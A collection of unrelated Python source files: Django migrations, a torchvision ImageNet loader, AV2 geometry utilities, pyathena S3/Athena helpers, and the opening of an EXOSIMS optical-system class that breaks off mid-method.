# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-05-12 05:48
from __future__ import unicode_literals

import datetime
from django.db import migrations, models
from django.utils.timezone import utc


class Migration(migrations.Migration):

    dependencies = [
        ('trans', '0003_auto_20170512_0537'),
    ]

    operations = [
        migrations.AlterField(
            model_name='contentversion',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2017, 5, 12, 5, 48, 31, 49055, tzinfo=utc)),
        ),
        migrations.AlterField(
            model_name='contest',
            name='slug',
            field=models.CharField(max_length=10, unique=True),
        ),
        migrations.AlterField(
            model_name='versionparticle',
            name='create_time',
            field=models.DateTimeField(default=datetime.datetime(2017, 5, 12, 5, 48, 31, 52323, tzinfo=utc)),
        ),
    ]
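# The frozen datetime defaults above are what `makemigrations` captures when a
# model field declares a non-callable default. A minimal sketch of the usual
# fix, assuming the field was meant to record creation time (the model below
# is illustrative, not part of the original app):
from django.db import models
from django.utils import timezone


class ContentVersionSketch(models.Model):
    # Passing the callable itself (no parentheses) re-evaluates it on each
    # save; calling it would bake one fixed timestamp into the migration,
    # exactly as in the generated file above.
    create_time = models.DateTimeField(default=timezone.now)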
# ----- nilq/baby-python | python -----
# Generated by Django 2.2.6 on 2019-10-28 21:28

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('base', '0021_delete_pnotes'),
    ]

    operations = [
        migrations.AlterField(
            model_name='note',
            name='modified',
            field=models.DateTimeField(blank=True, null=True),
        ),
    ]
# ----- nilq/baby-python | python -----
""" This file is based on the code from https://github.com/pytorch/vision/blob/master/torchvision/datasets/folder.py. """ from torchvision.datasets.vision import VisionDataset import torch import torch.utils.data as data import torchvision.transforms as transforms from PIL import Image import os import os.path import sys import json def make_custom_dataset(root, path_imgs, cls_dict): with open(path_imgs, 'r') as f: fnames = f.readlines() with open(cls_dict, 'r') as f: class_to_idx = json.load(f) images = [(os.path.join(root, c.split('\n')[0]), class_to_idx[c.split('/')[0]]) for c in fnames] return images class CustomDatasetFolder(VisionDataset): """A generic data loader where the samples are arranged in this way: :: root/class_x/xxx.ext root/class_x/xxy.ext root/class_x/xxz.ext root/class_y/123.ext root/class_y/nsdf3.ext root/class_y/asd932_.ext Args: root (string): Root directory path. loader (callable): A function to load a sample given its path. extensions (tuple[string]): A list of allowed extensions. both extensions and is_valid_file should not be passed. transform (callable, optional): A function/transform that takes in a sample and returns a transformed version. E.g, ``transforms.RandomCrop`` for images. target_transform (callable, optional): A function/transform that takes in the target and transforms it. is_valid_file (callable, optional): A function that takes path of an Image file and check if the file is a valid_file (used to check of corrupt files) both extensions and is_valid_file should not be passed. Attributes: classes (list): List of the class names. class_to_idx (dict): Dict with items (class_name, class_index). samples (list): List of (sample path, class_index) tuples targets (list): The class_index value for each image in the dataset """ def __init__(self, root, loader, extensions=None, transform=None, target_transform=None, is_valid_file=None): super(CustomDatasetFolder, self).__init__(root) self.transform = transform self.target_transform = target_transform classes, class_to_idx = self._find_classes(self.root) samples = make_custom_dataset(self.root, 'robustbench/data/imagenet_test_image_ids.txt', 'robustbench/data/imagenet_class_to_id_map.json') if len(samples) == 0: raise (RuntimeError("Found 0 files in subfolders of: " + self.root + "\n" "Supported extensions are: " + ",".join(extensions))) self.loader = loader self.extensions = extensions self.classes = classes self.class_to_idx = class_to_idx self.samples = samples self.targets = [s[1] for s in samples] def _find_classes(self, dir): """ Finds the class folders in a dataset. Args: dir (string): Root directory path. Returns: tuple: (classes, class_to_idx) where classes are relative to (dir), and class_to_idx is a dictionary. Ensures: No class is a subdirectory of another. """ if sys.version_info >= (3, 5): # Faster and available in Python 3.5 and above classes = [d.name for d in os.scandir(dir) if d.is_dir()] else: classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))] classes.sort() class_to_idx = {classes[i]: i for i in range(len(classes))} return classes, class_to_idx def __getitem__(self, index): """ Args: index (int): Index Returns: tuple: (sample, target) where target is class_index of the target class. 
""" path, target = self.samples[index] sample = self.loader(path) if self.transform is not None: sample = self.transform(sample) if self.target_transform is not None: target = self.target_transform(target) return sample, target, path def __len__(self): return len(self.samples) IMG_EXTENSIONS = ('.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif', '.tiff', '.webp') def pil_loader(path): # open path as file to avoid ResourceWarning (https://github.com/python-pillow/Pillow/issues/835) with open(path, 'rb') as f: img = Image.open(f) return img.convert('RGB') def accimage_loader(path): import accimage try: return accimage.Image(path) except IOError: # Potentially a decoding problem, fall back to PIL.Image return pil_loader(path) def default_loader(path): from torchvision import get_image_backend if get_image_backend() == 'accimage': return accimage_loader(path) else: return pil_loader(path) class CustomImageFolder(CustomDatasetFolder): """A generic data loader where the images are arranged in this way: :: root/dog/xxx.png root/dog/xxy.png root/dog/xxz.png root/cat/123.png root/cat/nsdf3.png root/cat/asd932_.png Args: root (string): Root directory path. transform (callable, optional): A function/transform that takes in an PIL image and returns a transformed version. E.g, ``transforms.RandomCrop`` target_transform (callable, optional): A function/transform that takes in the target and transforms it. loader (callable, optional): A function to load an image given its path. is_valid_file (callable, optional): A function that takes path of an Image file and check if the file is a valid_file (used to check of corrupt files) Attributes: classes (list): List of the class names. class_to_idx (dict): Dict with items (class_name, class_index). imgs (list): List of (image path, class_index) tuples """ def __init__(self, root, transform=None, target_transform=None, loader=default_loader, is_valid_file=None): super(CustomImageFolder, self).__init__(root, loader, IMG_EXTENSIONS if is_valid_file is None else None, transform=transform, target_transform=target_transform, is_valid_file=is_valid_file) self.imgs = self.samples if __name__ == '__main__': data_dir = '/home/scratch/datasets/imagenet/val' imagenet = CustomImageFolder(data_dir, transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor()])) torch.manual_seed(0) test_loader = data.DataLoader(imagenet, batch_size=5000, shuffle=True, num_workers=30) x, y, path = next(iter(test_loader)) with open('path_imgs_2.txt', 'w') as f: f.write('\n'.join(path)) f.flush()
# ----- nilq/baby-python | python -----
# <Copyright 2022, Argo AI, LLC. Released under the MIT license.>

"""Geometric utilities for manipulating point clouds, rigid objects, and vector geometry."""

from typing import Tuple, Union

import numpy as np
from scipy.spatial.transform import Rotation

from av2.utils.constants import PI
from av2.utils.typing import NDArrayBool, NDArrayFloat, NDArrayInt


def wrap_angles(angles: NDArrayFloat, period: float = PI) -> NDArrayFloat:
    """Map angles (in radians) from domain [-∞, ∞] to [0, π).

    Args:
        angles: (N,) array of angles
        period: Length of the domain.

    Returns:
        Angles (in radians) mapped to the interval [0, π).
    """
    # Map angles to [0, ∞].
    angles = np.abs(angles)

    # Calculate floor division and remainder simultaneously.
    divs, mods = np.divmod(angles, period)

    # Select angles which exceed specified period.
    angle_complement_mask = np.nonzero(divs)

    # Take set complement of `mods` w.r.t. the set [0, π].
    # `mods` must be nonzero, thus the image is the interval [0, π).
    angles[angle_complement_mask] = period - mods[angle_complement_mask]
    return angles


def xy_to_uv(xy: NDArrayFloat, width: int, height: int) -> NDArrayFloat:
    """Convert coordinates in R^2 (x,y) to texture coordinates (u,v) in R^2.

        (x,y) coordinates         (u,v) coordinates
                      (+y)        (0,0) - - - - - (+u)
                        |           |
                        |    ->     |
                        |           |
        (+x) - - - - (0,0)        (+v)

    The xy to uv coordinate transformation is shown above. We model pixel coordinates
    using the uv texture mapping convention.

    NOTE: Ellipses indicate any number of proceeding dimensions allowed for input.

    Args:
        xy: (...,2) array of coordinates in R^2 (x,y).
        width: Texture grid width.
        height: Texture grid height.

    Returns:
        (...,2) array of texture / pixel coordinates.
    """
    x = xy[..., 0]
    y = xy[..., 1]

    u = width - x - 1
    v = height - y - 1
    return np.stack((u, v), axis=-1)


def quat_to_mat(quat_wxyz: NDArrayFloat) -> NDArrayFloat:
    """Convert a quaternion to a 3D rotation matrix.

    NOTE: SciPy uses the scalar last quaternion notation. Throughout this repository,
          we use the scalar FIRST convention.

    Args:
        quat_wxyz: (...,4) array of quaternions in scalar first order.

    Returns:
        (...,3,3) 3D rotation matrix.
    """
    # Convert quaternion from scalar first to scalar last.
    quat_xyzw = quat_wxyz[..., [1, 2, 3, 0]]
    mat: NDArrayFloat = Rotation.from_quat(quat_xyzw).as_matrix()
    return mat


def mat_to_quat(mat: NDArrayFloat) -> NDArrayFloat:
    """Convert a 3D rotation matrix to a scalar _first_ quaternion.

    NOTE: SciPy uses the scalar last quaternion notation. Throughout this repository,
          we use the scalar FIRST convention.

    Args:
        mat: (...,3,3) 3D rotation matrices.

    Returns:
        (...,4) Array of scalar first quaternions.
    """
    # Convert quaternion from scalar last to scalar first.
    quat_xyzw: NDArrayFloat = Rotation.from_matrix(mat).as_quat()
    quat_wxyz: NDArrayFloat = quat_xyzw[..., [3, 0, 1, 2]]
    return quat_wxyz


def mat_to_xyz(mat: NDArrayFloat) -> NDArrayFloat:
    """Convert a 3D rotation matrix to a sequence of _extrinsic_ rotations.

    In other words, this function takes a 3D rotation matrix and returns a sequence
    of Tait-Bryan angles representing the transformation.

    Reference: https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix
    Reference: https://en.wikipedia.org/wiki/Euler_angles#Tait%E2%80%93Bryan_angles_2

    Args:
        mat: (...,3,3) Rotation matrix.

    Returns:
        (...,3) Tait-Bryan angles (in radians) formulated for a sequence of extrinsic rotations.
    """
    xyz_rad: NDArrayFloat = Rotation.from_matrix(mat).as_euler("xyz", degrees=False)
    return xyz_rad


def xyz_to_mat(xyz_rad: NDArrayFloat) -> NDArrayFloat:
    """Convert a sequence of rotations about the (x,y,z) axes to a 3D rotation matrix.

    In other words, this function takes in a sequence of Tait-Bryan angles and
    returns a 3D rotation matrix which represents the sequence of rotations.

    Computes:
        R = Rz(z) * Ry(y) * Rx(x)

    Reference: https://en.wikipedia.org/wiki/Euler_angles#Tait%E2%80%93Bryan_angles_2
    Reference: https://en.wikipedia.org/wiki/Euler_angles#Rotation_matrix

    Args:
        xyz_rad: (...,3) Tait-Bryan angles (in radians) of extrinsic rotations.

    Returns:
        (...,3,3) 3D Rotation matrix.
    """
    mat: NDArrayFloat = Rotation.from_euler("xyz", xyz_rad, degrees=False).as_matrix()
    return mat


def cart_to_sph(xyz: NDArrayFloat) -> NDArrayFloat:
    """Convert Cartesian coordinates into spherical coordinates.

    This function converts a set of points in R^3 to its spherical representation in R^3.

    NOTE: Ellipses indicate any number of proceeding dimensions allowed for input.

    Args:
        xyz: (...,3) Array of points (x,y,z) in Cartesian space.

    Returns:
        (...,3) Array in spherical space. [Order: (azimuth, inclination, radius)].
    """
    x = xyz[..., 0]
    y = xyz[..., 1]
    z = xyz[..., 2]

    hypot_xy = np.hypot(x, y)
    radius = np.hypot(hypot_xy, z)
    inclination = np.arctan2(z, hypot_xy)
    azimuth = np.arctan2(y, x)
    return np.stack((azimuth, inclination, radius), axis=-1)


def cart_to_hom(cart: NDArrayFloat) -> NDArrayFloat:
    """Convert Cartesian coordinates into homogeneous coordinates.

    This function converts a set of points in R^N to its homogeneous representation in R^(N+1).

    Args:
        cart: (M,N) Array of points in Cartesian space.

    Returns:
        NDArrayFloat: (M,N+1) Array in homogeneous space.
    """
    M, N = cart.shape
    hom: NDArrayFloat = np.ones((M, N + 1))
    hom[:, :N] = cart
    return hom


def hom_to_cart(hom: NDArrayFloat) -> NDArrayFloat:
    """Convert homogeneous coordinates into Cartesian coordinates.

    This function converts a set of points in R^(N+1) to its Cartesian representation in R^N.

    Args:
        hom: (M,N+1) Array of points in homogeneous space.

    Returns:
        NDArrayFloat: (M,N) Array in Cartesian space.
    """
    N = hom.shape[1] - 1
    cart: NDArrayFloat = hom[:, :N] / hom[:, N : N + 1]
    return cart


def crop_points(
    points: Union[NDArrayFloat, NDArrayInt],
    lower_bound_inclusive: Tuple[float, ...],
    upper_bound_exclusive: Tuple[float, ...],
) -> Tuple[NDArrayFloat, NDArrayFloat]:
    """Crop points to a lower and upper boundary.

    NOTE: Ellipses indicate any number of proceeding dimensions allowed for input.

    Args:
        points: (...,n) n-dimensional array of points.
        lower_bound_inclusive: (n,) Coordinates lower bound (inclusive).
        upper_bound_exclusive: (n,) Coordinates upper bound (exclusive).

    Raises:
        ValueError: If dimensions between xyz and the provided bounds don't match.

    Returns:
        (...,n) Tuple of cropped points and the corresponding boolean mask.
    """
    # Gather dimensions.
    n_dim = points.shape[-1]
    lb_dim = len(lower_bound_inclusive)
    ub_dim = len(upper_bound_exclusive)

    # Ensure that the logical operations will broadcast.
    if n_dim != lb_dim or n_dim != ub_dim:
        raise ValueError(f"Dimensions n_dim {n_dim} must match both lb_dim {lb_dim} and ub_dim {ub_dim}")

    # Ensure that the lower bound is less than or equal to the upper bound for each dimension.
    if not all(lb < ub for lb, ub in zip(lower_bound_inclusive, upper_bound_exclusive)):
        raise ValueError("Lower bound must be less than or equal to upper bound for each dimension")

    # Lower bound mask.
    lb_mask = np.greater_equal(points, lower_bound_inclusive)

    # Upper bound mask.
    ub_mask = np.less(points, upper_bound_exclusive)

    # Bound mask.
    is_valid_points = np.logical_and(lb_mask, ub_mask).all(axis=-1)
    return points[is_valid_points], is_valid_points


def compute_interior_points_mask(points_xyz: NDArrayFloat, cuboid_vertices: NDArrayFloat) -> NDArrayBool:
    r"""Compute the interior points mask for the cuboid.

    Reference: https://math.stackexchange.com/questions/1472049/check-if-a-point-is-inside-a-rectangular-shaped-area-3d

            5------4
            |\\    |\\
            | \\   | \\
            6--\\--7  \\
            \\  \\  \\ \\
        l    \\  1-------0    h
         e    \\ ||   \\ ||   e
          n    \\||    \\||   i
           g    \\2------3    g
            t      width.     h
             h.               t.

    Args:
        points_xyz: (N,3) Array representing a point cloud in Cartesian coordinates (x,y,z).
        cuboid_vertices: (8,3) Array representing 3D cuboid vertices, ordered as shown above.

    Returns:
        (N,) An array of boolean flags indicating whether the points are interior to the cuboid.
    """
    # Get three corners of the cuboid vertices.
    vertices: NDArrayFloat = np.stack((cuboid_vertices[6], cuboid_vertices[3], cuboid_vertices[1]))  # (3,3)

    # Choose reference vertex.
    # vertices and choice of ref_vertex are coupled.
    ref_vertex = cuboid_vertices[2]  # (3,)

    # Compute orthogonal edges of the cuboid.
    uvw = ref_vertex - vertices  # (3,3)

    # Compute signed values which are proportional to the distance from the vector.
    sim_uvw_points = points_xyz @ uvw.transpose()  # (N,3)
    sim_uvw_ref = uvw @ ref_vertex  # (3,)

    # Only care about the diagonal.
    sim_uvw_vertices: NDArrayFloat = np.diag(uvw @ vertices.transpose())  # type: ignore  # (3,)

    # Check 6 conditions (2 for each of the 3 orthogonal directions).
    # Refer to the linked reference for additional information.
    constraint_a = np.logical_and(sim_uvw_ref <= sim_uvw_points, sim_uvw_points <= sim_uvw_vertices)
    constraint_b = np.logical_and(sim_uvw_ref >= sim_uvw_points, sim_uvw_points >= sim_uvw_vertices)
    is_interior: NDArrayBool = np.logical_or(constraint_a, constraint_b).all(axis=1)
    return is_interior
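# A quick usage sketch of the conversions above (not part of the original
# module; every value follows directly from the documented conventions):
if __name__ == "__main__":
    # Identity rotation, scalar-FIRST (wxyz) order per quat_to_mat's docstring.
    quat_wxyz = np.array([1.0, 0.0, 0.0, 0.0])
    mat = quat_to_mat(quat_wxyz)
    assert np.allclose(mat, np.eye(3))
    assert np.allclose(mat_to_quat(mat), quat_wxyz)

    # wrap_angles maps into [0, pi): pi + 0.5 wraps to pi - 0.5.
    assert np.allclose(wrap_angles(np.array([np.pi + 0.5])), np.pi - 0.5)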
# ----- nilq/baby-python | python -----
# Generated by Django 3.0.7 on 2020-07-28 14:00

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('disdata', '0028_auto_20200728_0924'),
    ]

    operations = [
        migrations.AlterField(
            model_name='disease',
            name='vaccination_regiment',
            field=models.CharField(blank=True, max_length=255),
        ),
    ]
# ----- nilq/baby-python | python -----
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals

import functools
import logging
import threading
import re
import uuid

import tenacity
from past.builtins import xrange
from tenacity import (after_log, retry_if_exception,
                      stop_after_attempt, wait_exponential)

from pyathena import DataError, OperationalError
from pyathena.model import AthenaCompression

_logger = logging.getLogger(__name__)

PATTERN_OUTPUT_LOCATION = re.compile(r'^s3://(?P<bucket>[a-zA-Z0-9.\-_]+)/(?P<key>.+)$')


def parse_output_location(output_location):
    match = PATTERN_OUTPUT_LOCATION.search(output_location)
    if match:
        return match.group('bucket'), match.group('key')
    else:
        raise DataError('Unknown `output_location` format.')


def get_chunks(df, chunksize=None):
    rows = len(df)
    if rows == 0:
        return
    if chunksize is None:
        chunksize = rows
    elif chunksize <= 0:
        raise ValueError('Chunk size argument must be greater than zero')

    chunks = int(rows / chunksize) + 1
    for i in xrange(chunks):
        start_i = i * chunksize
        end_i = min((i + 1) * chunksize, rows)
        if start_i >= end_i:
            break
        yield df[start_i:end_i]


def reset_index(df, index_label=None):
    df.index.name = index_label if index_label else 'index'
    try:
        df.reset_index(inplace=True)
    except ValueError as e:
        raise ValueError('Duplicate name in index/columns: {0}'.format(e))


def as_pandas(cursor, coerce_float=False):
    from pandas import DataFrame
    names = [metadata[0] for metadata in cursor.description]
    return DataFrame.from_records(cursor.fetchall(), columns=names,
                                  coerce_float=coerce_float)


def to_sql_type_mappings(col):
    import pandas as pd
    # `pd._lib.infer_dtype` is a private-API spelling; the public equivalent
    # is `pd.api.types.infer_dtype`.
    col_type = pd.api.types.infer_dtype(col, skipna=True)
    if col_type == 'datetime64' or col_type == 'datetime':
        return 'TIMESTAMP'
    elif col_type == 'timedelta':
        return 'INT'
    elif col_type == 'timedelta64':
        return 'BIGINT'
    elif col_type == 'floating':
        if col.dtype == 'float32':
            return 'FLOAT'
        else:
            return 'DOUBLE'
    elif col_type == 'integer':
        if col.dtype == 'int32':
            return 'INT'
        else:
            return 'BIGINT'
    elif col_type == 'boolean':
        return 'BOOLEAN'
    elif col_type == 'date':
        return 'DATE'
    elif col_type == 'bytes':
        return 'BINARY'
    elif col_type in ['complex', 'time']:
        raise ValueError('{0} datatype not supported'.format(col_type))
    return 'STRING'


def to_sql(df, name, conn, location, schema='default',
           index=False, index_label=None, chunksize=None,
           if_exists='fail', compression=None, flavor='spark',
           type_mappings=to_sql_type_mappings):
    # TODO Supports orc, avro, json, csv or tsv format
    # TODO Supports partitioning
    if if_exists not in ('fail', 'replace', 'append'):
        raise ValueError('`{0}` is not valid for if_exists'.format(if_exists))
    if compression is not None and not AthenaCompression.is_valid(compression):
        raise ValueError('`{0}` is not valid for compression'.format(compression))

    import pyarrow as pa
    import pyarrow.parquet as pq
    bucket_name, key_prefix = parse_output_location(location)
    bucket = conn.session.resource('s3', region_name=conn.region_name,
                                   **conn._client_kwargs).Bucket(bucket_name)
    cursor = conn.cursor()
    retry_config = conn.retry_config

    table = cursor.execute("""
    SELECT table_name
    FROM information_schema.tables
    WHERE table_schema = '{schema}'
    AND table_name = '{table}'
    """.format(schema=schema, table=name)).fetchall()
    if if_exists == 'fail':
        if table:
            raise OperationalError('Table `{0}.{1}` already exists.'.format(schema, name))
    elif if_exists == 'replace':
        if table:
            cursor.execute("""
            DROP TABLE {schema}.{table}
            """.format(schema=schema, table=name))
            objects = bucket.objects.filter(Prefix=key_prefix)
            if list(objects.limit(1)):
                objects.delete()

    if index:
        reset_index(df, index_label)
    for chunk in get_chunks(df, chunksize):
        table = pa.Table.from_pandas(chunk)
        buf = pa.BufferOutputStream()
        pq.write_table(table, buf,
                       compression=compression,
                       flavor=flavor)
        retry_api_call(bucket.put_object,
                       config=retry_config,
                       Body=buf.getvalue().to_pybytes(),
                       Key=key_prefix + str(uuid.uuid4()))

    ddl = generate_ddl(df=df, name=name, location=location, schema=schema,
                       compression=compression, type_mappings=type_mappings)
    cursor.execute(ddl)


def get_column_names_and_types(df, type_mappings):
    return [
        (str(df.columns[i]), type_mappings(df.iloc[:, i]))
        for i in xrange(len(df.columns))
    ]


def generate_ddl(df, name, location, schema='default',
                 compression=None, type_mappings=to_sql_type_mappings):
    ddl = 'CREATE EXTERNAL TABLE IF NOT EXISTS `{0}`.`{1}` (\n'.format(schema, name)
    ddl += ',\n'.join([
        '`{0}` {1}'.format(c[0], c[1])
        for c in get_column_names_and_types(df, type_mappings)
    ])
    ddl += '\n)\n'
    ddl += 'STORED AS PARQUET\n'
    ddl += "LOCATION '{0}'\n".format(location)
    if compression:
        ddl += "TBLPROPERTIES ('parquet.compress'='{0}')\n".format(compression.upper())
    return ddl


def synchronized(wrapped):
    """The missing @synchronized decorator

    https://git.io/vydTA"""
    _lock = threading.RLock()

    @functools.wraps(wrapped)
    def _wrapper(*args, **kwargs):
        with _lock:
            return wrapped(*args, **kwargs)
    return _wrapper


class RetryConfig(object):

    def __init__(self, exceptions=('ThrottlingException', 'TooManyRequestsException'),
                 attempt=5, multiplier=1, max_delay=100, exponential_base=2):
        self.exceptions = exceptions
        self.attempt = attempt
        self.multiplier = multiplier
        self.max_delay = max_delay
        self.exponential_base = exponential_base


def retry_api_call(func, config, logger=None, *args, **kwargs):
    retry = tenacity.Retrying(
        retry=retry_if_exception(
            lambda e: getattr(e, 'response', {}).get(
                'Error', {}).get('Code', None) in config.exceptions
            if e else False),
        stop=stop_after_attempt(config.attempt),
        wait=wait_exponential(multiplier=config.multiplier,
                              max=config.max_delay,
                              exp_base=config.exponential_base),
        after=after_log(logger, logger.level) if logger else None,
        reraise=True
    )
    return retry(func, *args, **kwargs)
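# A sketch of the DDL that generate_ddl() above emits for a small frame (not
# part of the original module; the S3 location is illustrative, and the column
# types follow to_sql_type_mappings):
if __name__ == '__main__':
    import pandas as pd
    df = pd.DataFrame({'name': ['a', 'b'], 'score': [1.5, 2.5], 'n': [1, 2]})
    print(generate_ddl(df, name='scores', location='s3://bucket/prefix/'))
    # Expected shape of the output (STRING/DOUBLE/BIGINT per the mappings):
    # CREATE EXTERNAL TABLE IF NOT EXISTS `default`.`scores` (
    # `name` STRING,
    # `score` DOUBLE,
    # `n` BIGINT
    # )
    # STORED AS PARQUET
    # LOCATION 's3://bucket/prefix/'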
# ----- nilq/baby-python | python -----
# -*- coding: utf-8 -*-
# NOTE: this module is Python 2 code (it relies on dict.has_key, basestring,
# and print statements).
import astropy.units as u
import numpy as np
import os.path
import astropy.io.fits as fits
import numbers
from operator import itemgetter
import scipy.interpolate
import scipy.optimize

class OpticalSystem(object):
    """Optical System class template

    This class contains all variables and methods necessary to perform
    Optical System Definition Module calculations in exoplanet mission
    simulation.

    Args:
        \*\*specs:
            User specified values.

    Attributes:
        obscurFac (float):
            Obscuration factor due to secondary mirror and spiders
        shapeFac (float):
            Shape factor of the unobscured pupil area, so that
            shapeFac * pupilDiam^2 * (1-obscurFac) = pupilArea
        pupilDiam (astropy Quantity):
            Entrance pupil diameter in units of m
        pupilArea (astropy Quantity):
            Entrance pupil area in units of m2
        telescopeKeepout (astropy Quantity):
            Telescope keepout angle in units of deg
        attenuation (float):
            Non-coronagraph attenuation, equal to the throughput of the
            optical system without the coronagraph elements
        intCutoff (astropy Quantity):
            Maximum allowed integration time in units of day
        Npix (float):
            Number of noise pixels
        Ndark (float):
            Number of dark frames used
        dMagLim (float):
            Fundamental limiting delta magnitude
        haveOcculter (boolean):
            Boolean signifying if the system has an occulter
        F0 (callable(lam)):
            Spectral flux density
        IWA (astropy Quantity):
            Fundamental Inner Working Angle in units of arcsec
        OWA (astropy Quantity):
            Fundamental Outer Working Angle in units of arcsec
        scienceInstruments (list of dicts):
            All science instrument attributes (variable)
        Imager (dict):
            Dictionary containing imaging camera attributes.
            Default to scienceInstruments[0]
        Spectro (dict):
            Dictionary containing spectrograph attributes.
            Default to scienceInstruments[-1]
        starlightSuppressionSystems (list of dicts):
            All starlight suppression system attributes (variable)
        ImagerSyst (dict):
            Dictionary containing imaging coronagraph attributes.
            Default to starlightSuppressionSystems[0]
        SpectroSyst (dict):
            Dictionary containing spectroscopy coronagraph attributes.
            Default to starlightSuppressionSystems[-1]

    Common Science Instrument Attributes:
        type (string):
            Instrument type (e.g. imaging, spectro)
        lam (astropy Quantity):
            Central wavelength in units of nm
        deltaLam (astropy Quantity):
            Bandwidth in units of nm
        BW (float):
            Bandwidth fraction
        pitch (astropy Quantity):
            Pixel pitch in units of m
        focal (astropy Quantity):
            Focal length in units of m
        idark (astropy Quantity):
            Dark current rate in units of 1/s
        texp (astropy Quantity):
            Exposure time per frame in units of s
        sread (float):
            Detector readout noise
        CIC (float):
            Clock-induced-charge
        ENF (float):
            Excess noise factor
        Gem (float):
            Electron multiplication gain
        Rs (float):
            Spectral resolving power
        Ns (float):
            Number of spectral elements in each band
        QE (callable(lam)):
            Quantum efficiency (must be callable - can be lambda function,
            scipy.interpolate.interp2d object, etc.) with input wavelength
            (astropy Quantity).

    Common Starlight Suppression System Attributes:
        type (string):
            System type (e.g. internal, external, hybrid), should also contain the
            type of science instrument it can be used with (e.g. imaging, spectro)
        throughput (callable(lam, WA)):
            System throughput (must be callable - can be lambda function,
            scipy.interpolate.interp2d object, etc.) with inputs wavelength
            (astropy Quantity) and angular separation/working angle (astropy Quantity).
        contrast (callable(lam, WA)):
            System contrast curve (must be callable - can be lambda function,
            scipy.interpolate.interp2d object, etc.) with inputs wavelength
            (astropy Quantity) and angular separation/working angle (astropy Quantity).
        IWA (astropy Quantity):
            Inner working angle in units of arcsec
        OWA (astropy Quantity):
            Outer working angle in units of arcsec
        PSF (callable(lam, WA)):
            Point spread function - 2D ndarray of values, normalized to 1 at the core
            (must be callable - can be lambda function, scipy.interpolate.interp2d
            object, etc.) with inputs wavelength (astropy Quantity) and angular
            separation/working angle (astropy Quantity). Note: normalization means
            that all throughput effects must be contained in the throughput attribute.
        samp (astropy Quantity):
            Sampling of PSF in units of arcsec (per pixel)
        ohTime (astropy Quantity):
            Overhead time in units of days
        imagTimeMult (float):
            Imaging time multiplier
        charTimeMult (float):
            Characterization time multiplier
    """

    _modtype = 'OpticalSystem'
    _outspec = {}

    def __init__(self, obscurFac=0.1, shapeFac=np.pi/4, pupilDiam=4, telescopeKeepout=45,
                 attenuation=0.6, intCutoff=50, Npix=14.3, Ndark=10, dMagLim=20,
                 scienceInstruments=None, lam=500, BW=0.2, pitch=13e-6, focal=240,
                 idark=9e-5, texp=1e3, sread=3, CIC=0.0013, ENF=1, Gem=1, Rs=70, QE=0.9,
                 starlightSuppressionSystems=None, throughput=1e-2, contrast=1e-9,
                 PSF=np.ones((3,3)), samp=10, ohTime=1, imagTimeMult=1,
                 charTimeMult=1, IWA=None, OWA=None, **specs):

        # load all values with defaults
        self.obscurFac = float(obscurFac)       # obscuration factor
        self.shapeFac = float(shapeFac)         # shape factor
        self.pupilDiam = float(pupilDiam)*u.m   # entrance pupil diameter
        self.pupilArea = (1-self.obscurFac)*self.shapeFac*self.pupilDiam**2  # entrance pupil area
        self.telescopeKeepout = float(telescopeKeepout)*u.deg  # keepout angle in degrees
        self.attenuation = float(attenuation)   # non-coronagraph attenuation factor
        self.intCutoff = float(intCutoff)*u.d   # integration time cutoff
        self.Npix = float(Npix)                 # number of noise pixels
        self.Ndark = float(Ndark)               # number of dark frames used
        self.dMagLim = float(dMagLim)           # fundamental delta magnitude limit

        # Spectral flux density ~9.5e7 [ph/s/m2/nm] @ 500nm
        # F0(lambda) function of wavelength, based on Traub et al. 2016 (JATIS):
        self.F0 = lambda lam: 1e4*10**(4.01 - (lam.to('nm').value - 550)/770)*u.ph/u.s/u.m**2/u.nm

        # loop through all science Instruments (must have one defined)
        assert scienceInstruments, "No science instrument defined."
        self.scienceInstruments = scienceInstruments
        self._outspec['scienceInstruments'] = []
        for ninst, inst in enumerate(self.scienceInstruments):
            assert isinstance(inst, dict), "Science instruments must be defined as dicts."
            assert inst.has_key('type') and isinstance(inst['type'], basestring), \
                    "All science instruments must have key type."
            # populate with values that may be filenames (interpolants)
            inst['QE'] = inst.get('QE', QE)
            self._outspec['scienceInstruments'].append(inst.copy())

            # When provided, always use bandwidth (nm) instead of bandwidth fraction.
            inst['lam'] = float(inst.get('lam', lam))*u.nm      # central wavelength (nm)
            inst['deltaLam'] = float(inst.get('deltaLam', inst['lam'].value
                    *inst.get('BW', BW)))*u.nm                  # bandwidth (nm)
            inst['BW'] = float(inst['deltaLam']/inst['lam'])    # bandwidth fraction
            # Default lam and BW updated with values from first instrument
            if ninst == 0:
                lam, BW = inst.get('lam').value, inst.get('BW')

            # Loading detector specifications
            inst['pitch'] = float(inst.get('pitch', pitch))*u.m # pixel pitch
            inst['focal'] = float(inst.get('focal', focal))*u.m # focal length
            inst['idark'] = float(inst.get('idark', idark))/u.s # dark-current rate
            inst['texp'] = float(inst.get('texp', texp))*u.s    # exposure time per frame
            inst['sread'] = float(inst.get('sread', sread))     # detector readout noise
            inst['CIC'] = float(inst.get('CIC', CIC))           # clock-induced-charge
            inst['ENF'] = float(inst.get('ENF', ENF))           # excess noise factor
            inst['Gem'] = float(inst.get('Gem', Gem))           # e- multiplication gain
            inst['Rs'] = float(inst.get('Rs', Rs))              # spectral resolving power
            inst['Ns'] = float(inst['Rs']*inst['BW']) if 'spec' in inst['type'].lower() \
                    else 1.  # number of spectral elements in each band

            # quantum efficiency
            if inst.has_key('QE'):
                if isinstance(inst['QE'], basestring):
                    assert os.path.isfile(inst['QE']), \
                            "%s is not a valid file."%inst['QE']
                    tmp = fits.open(inst['QE'])
                    # basic validation here for size and wavelength
                    # inst['QE'] = lambda or interp
                elif isinstance(inst['QE'], numbers.Number):
                    inst['QE'] = lambda lam, QE=float(inst['QE']): QE/u.photon

            # populate detector specifications to outspec
            for att in inst.keys():
                if att not in ['QE']:
                    dat = inst[att]
                    self._outspec['scienceInstruments'][ninst][att] = dat.value \
                            if isinstance(dat, u.Quantity) else dat

        # loop through all starlight suppression systems (must have one defined)
        assert starlightSuppressionSystems, "No starlight suppression systems defined."
